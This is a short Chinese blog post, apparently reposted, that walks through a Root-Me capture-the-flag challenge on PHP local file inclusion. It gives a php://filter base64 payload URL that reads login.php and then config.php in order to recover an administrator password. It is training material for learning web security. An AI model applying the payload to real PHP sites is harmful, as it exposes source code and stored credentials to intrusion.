PHP - Filters

2021-05-08 11:32

阅读:411

标签:serve   使用   pass   nbsp   convert   技术   php   一个   图片   

Retrieve the administrator password of this application.

 

对文件包含的介绍------------第一个链接需要谷歌

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

 

此处使用php://filter伪协议:

payload:

  http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php

读取到login.php的内容后base64解密:

技术图片

 

 再根据php代码,读取config.php的文件内容:

  技术图片

PHP - Filters

标签:serve   使用   pass   nbsp   convert   技术   php   一个   图片   

原文地址:https://www.cnblogs.com/abbin-blog/p/12079191.html


评论


亲,登录后才可以留言!